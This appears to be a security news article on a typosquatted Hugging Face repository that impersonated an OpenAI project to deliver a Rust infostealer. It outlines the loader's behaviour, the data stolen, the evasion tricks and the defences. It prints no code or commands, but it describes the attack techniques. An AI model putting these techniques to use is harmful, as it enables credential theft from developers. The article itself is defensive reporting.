Fake OpenAI Repository on Hugging Face Distributed Advanced Infostealer Malware Through a Typosquatting AI Project Campaign

Malicious AI Repository Impersonated OpenAI’s Privacy Filter Project and Delivered Credential Theft Malware to Windows Users Through Hugging Face Downloads

OVERVIEW

Cybersecurity researchers have uncovered a malicious repository hosted on Hugging Face that impersonated a legitimate OpenAI project in order to distribute advanced infostealer malware to Windows users.

The malicious repository, named “Open-OSS/privacy-filter,” reportedly reached the top trending position on Hugging Face before being removed. During its exposure window, the repository accumulated approximately 244,000 downloads, although researchers believe some download activity may have been artificially inflated.

The campaign demonstrates how threat actors are increasingly abusing trusted AI and machine learning ecosystems to distribute malware through fake repositories, typosquatting, and deceptive open-source projects.

HOW THE ATTACK WORKED

Researchers discovered that the malicious repository copied the appearance and documentation of OpenAI’s legitimate Privacy Filter release almost verbatim.

The fake project included a malicious Python script named loader.py, which appeared to contain harmless AI-related functionality. However, hidden inside the script was a malware delivery mechanism designed to fetch and execute additional payloads on Windows systems.

The attack chain included:

Fake AI project impersonation
Typosquatting of a legitimate repository
Hidden malware loader functionality
PowerShell-based payload execution
Privilege escalation
Deployment of a Rust-based infostealer

The malicious loader disabled SSL verification, decoded an external URL from Base64-encoded data, and downloaded a JSON payload containing a hidden PowerShell command.

That command silently executed additional malware components in the background without displaying visible prompts to the victim.

FINAL PAYLOAD: RUST-BASED INFOSTEALER

The final malware payload, referred to as “sefirah,” was a sophisticated Rust-based infostealer designed to harvest large amounts of sensitive data from infected systems.

Data targeted by the malware included:

Browser cookies
Saved passwords
Session tokens
Browser history
Encryption keys
Discord tokens
Cryptocurrency wallet data
SSH credentials
FTP configurations
VPN credentials
Wallet seed phrases
Local sensitive files
Multi-monitor screenshots
System information

The malware targeted both Chromium-based and Gecko-based browsers, significantly increasing its reach across Windows environments.

Additionally, the malware reportedly added itself to Microsoft Defender exclusions to reduce the chances of detection and removal.

ANTI-ANALYSIS AND EVASION TECHNIQUES

Researchers observed that the malware included extensive anti-analysis protections designed to evade sandboxes, researchers, and automated detection systems.

Anti-analysis features included:

Virtual machine detection
Sandbox detection
Debugger detection
Security tool enumeration
Analysis environment checks

These protections allowed the malware to terminate execution or alter behavior when suspicious environments were detected, making forensic analysis more difficult.

CONNECTIONS TO OTHER MALWARE CAMPAIGNS

Investigators identified overlaps between this Hugging Face campaign and broader typosquatting operations targeting software developers and AI users.

The infrastructure used in the malicious repository reportedly shared similarities with campaigns distributing:

NPM typosquatting malware
WinOS 4.0 implants
Credential-stealing payloads
Fake open-source packages

This indicates that threat actors are increasingly focusing on software supply chain compromise and trusted developer ecosystems as malware distribution channels.

WHY THIS INCIDENT IS IMPORTANT

This incident highlights the growing security risks surrounding AI repositories, open-source platforms, and machine learning ecosystems.

AI platforms such as Hugging Face are trusted by developers, researchers, and enterprises worldwide. Consequently, malicious repositories hosted on these services can quickly gain visibility and credibility, especially when attackers imitate well-known organizations like OpenAI.

The campaign also demonstrates how threat actors are adapting traditional software supply chain attacks to AI development environments. As AI adoption continues growing, these ecosystems are becoming increasingly attractive targets for financially motivated attackers.

RISKS TO DEVELOPERS AND ORGANIZATIONS

Malicious AI repositories create significant risks for both individuals and enterprises.

Potential impacts include:

Credential theft
Session hijacking
Cryptocurrency theft
Corporate network compromise
Developer environment compromise
Persistent malware infections
Supply chain infiltration
Unauthorized access to cloud services

Because many developers execute code directly from repositories without deep verification, these attacks can spread rapidly through trusted workflows.

RECOMMENDED SECURITY MEASURES

Organizations and developers using AI repositories and open-source machine learning tools should strengthen verification and supply chain security practices.

Recommended protections include:

1. Verify Repository Authenticity
Carefully confirm publisher identity, repository ownership, and official project references before downloading code or models.

2. Avoid Blind Execution of Scripts
Never execute downloaded scripts directly without reviewing the source code and validating dependencies.

3. Use Isolated Environments
Run experimental AI models and tools inside sandboxed or isolated virtual environments whenever possible.

4. Monitor Endpoint Activity
Deploy EDR/XDR solutions capable of detecting PowerShell abuse, infostealers, privilege escalation, and suspicious outbound traffic.

5. Rotate Credentials After Exposure
Users who downloaded suspicious repositories should immediately:

Reset passwords
Rotate API keys
Replace cryptocurrency wallets and seed phrases
Invalidate active browser sessions
Reimage affected systems if compromise is suspected

FINAL ANALYSIS

The fake OpenAI repository campaign demonstrates how cybercriminals are evolving beyond traditional phishing and malware delivery methods by exploiting trust within AI and developer communities.

By abusing platforms like Hugging Face and impersonating legitimate AI projects, attackers can distribute malware at scale while appearing credible to developers and researchers.

As artificial intelligence ecosystems continue expanding, organizations must treat AI repositories and machine learning supply chains as critical security boundaries requiring continuous validation, monitoring, and threat detection.

Over 20,000 Instagram Accounts Hijacked Through Meta AI Support Flaw

Nottingham University Data Breach Exposes Records of More Than 450,000 Students

DragonForce Ransomware Hides C2 Traffic Inside Microsoft Teams Infrastructure

North Korean Hackers Weaponize Developer Tools to Turn Code Workflows Into Malware Delivery Channels

Anthropic Unveils Claude Fable 5 with Built-In Cyber Safeguards as AI Security Enters a New Era

ATHR AI Vishing Platform Automates Voice Phishing at Scale

How Modern Businesses Can Measure Cyber Risk in Financial and Operational Terms Instead of Technical Guesswork

What Is Wiper Malware in Cybersecurity? Understanding One of the Most Destructive Types of Cyber Attacks

Why Delaying Software Updates Can Put Your Entire Digital Security at Risk

How Attackers Abuse Legitimate Windows Tools: Understanding LOLBins and Living-Off-the-Land Attacks

Brave Launches Paid ‘Origin’ Browser for Users Seeking a Cleaner, Privacy-First Experience

Apple Blocks $11 Billion in App Store Fraud as Mobile Threats Continue to Rise

Fake OpenAI Repository on Hugging Face Distributed Advanced Infostealer Malware Through a Typosquatting AI Project Campaign